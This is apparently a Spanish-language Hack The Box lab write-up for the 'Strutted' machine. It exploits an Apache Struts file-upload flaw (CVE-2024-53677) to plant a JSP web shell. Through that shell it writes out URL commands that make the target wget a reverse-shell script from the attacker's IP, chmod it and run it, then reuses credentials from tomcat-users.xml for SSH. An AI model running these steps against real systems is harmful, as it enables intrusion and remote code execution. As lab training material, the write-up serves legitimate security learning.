Strutted

#easy #linux

https://app.hackthebox.com/machines/644arrow-up-right


Enumeración

http://strutted.htb/arrow-up-right

Click en Download

Buscar vulnerabilidades para struts 6.3.0.1

https://blog-qualys-com.translate.goog/vulnerabilities-threat-research/2024/12/16/critical-apache-struts-file-upload-vulnerability-cve-2024-53677-risks-implications-and-enterprise-countermeasures?_x_tr_sl=en&_x_tr_tl=es&_x_tr_hl=es&_x_tr_pto=tcarrow-up-right

Interceptar la request al subir una imagen

https://raw.githubusercontent.com/TAM-K592/CVE-2024-53677-S2-067/refs/heads/ALOK/shell.jsparrow-up-right

Reemplazar en la request el contenido de la imagen por el del payload shell.jsp

Crear un archivo con la reverse shell

Levantar un servidor en la máquina atacante para compartir el archivo con la reverse shell

Ponerse en escucha en la máquina atacante para recibir la reverse shell

Descargar el archivo a la máquina víctima

http://strutted.htb/shell.jsp?action=cmd&cmd=wget+10.10.15.113/shell.sh+- O+/tmp/shell.sh

Modificar permisos de la reverse shell

http://strutted.htb/shell.jsp?action=cmd&cmd=chmod+777+/tmp/shell.sh

Ejecutar la reverse shell

http://strutted.htb/shell.jsp?action=cmd&cmd=/tmp/shell.sh

Una vez obtenida la reverse shell, hacerla interactiva Shell interactiva estable

Conectarse por SSH al servidor con la contraseña obtenida en el archivo tomcat-users.xml y el usuario james

Para poder limpiar la consola presionando ctrl + l

User Flag

Root Flag

Last updated